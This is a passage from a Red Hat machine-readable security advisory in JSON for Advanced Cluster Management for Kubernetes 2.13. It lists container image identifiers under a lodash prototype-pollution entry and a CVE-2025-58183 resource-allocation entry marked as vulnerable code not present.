"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "lodash: prototype pollution in _.unset and _.omit functions"
},
{
"cve": "CVE-2025-58183",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-10-29T23:01:50.573951+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
